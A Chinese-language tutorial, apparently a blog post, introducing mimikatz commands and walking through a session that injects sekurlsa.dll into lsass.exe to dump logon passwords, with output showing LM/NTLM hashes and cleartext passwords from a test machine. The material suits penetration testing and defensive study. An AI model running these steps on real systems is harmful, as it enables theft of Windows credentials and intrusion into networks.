mimikatz是法国的一位神牛写的神器,该神器有很强大的功能,据说已经被集成在metasplo
1.常规的操作使用命令
mimikatz # cls –>清屏,类似dos命令cls.
mimikatz # exit –>退出mimikatz.
mimikatz #version –>查看当前的mimikatz的版本.
随便输入”xxx::”,会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令

查看列表中命令的具体参数同样可以输入”命令::”来查看,比如:”inject::”,如图:

可以看到命令inject的具体参数有pid,process,service等……
2.系统方面的操作使用命令:system
mimikatz #system::user –>查看当前登录的系统用户
mimikazt #system::computer –>返回当前的计算机名称
3.在服务器终端的操作命令: ts
mimikatz #ts::sessions –>显示当前的会话
mimikatz #ts::processes windows-d.vm.nirvana.local –>显示服务器的进程和对应的pid情况等。
4.系统服务相关的操作使用命令:service
5.系统进程相关操作的使用命令:process
6.系统线程相关操作使用命令:thread
7.系统句柄相关操作使用命令:handle
8.加密相关操作使用命令:crypto
9.注入操作使用命令:inject
具体的各种神器功能使用有待神人挖掘,表示不会外文压力很大……
分享从lsass抓去系统的明文密码案例:
mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */
mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;434898 Package d’authentification : NTLM Utilisateur principal : Gentil User Domaine d’authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : password Authentification Id : 0;269806 Package d’authentification : NTLM Utilisateur principal : Gentil Kiwi Domaine d’authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/
tspkg : waza1234/
作者blog:http://blog./mimikatz
|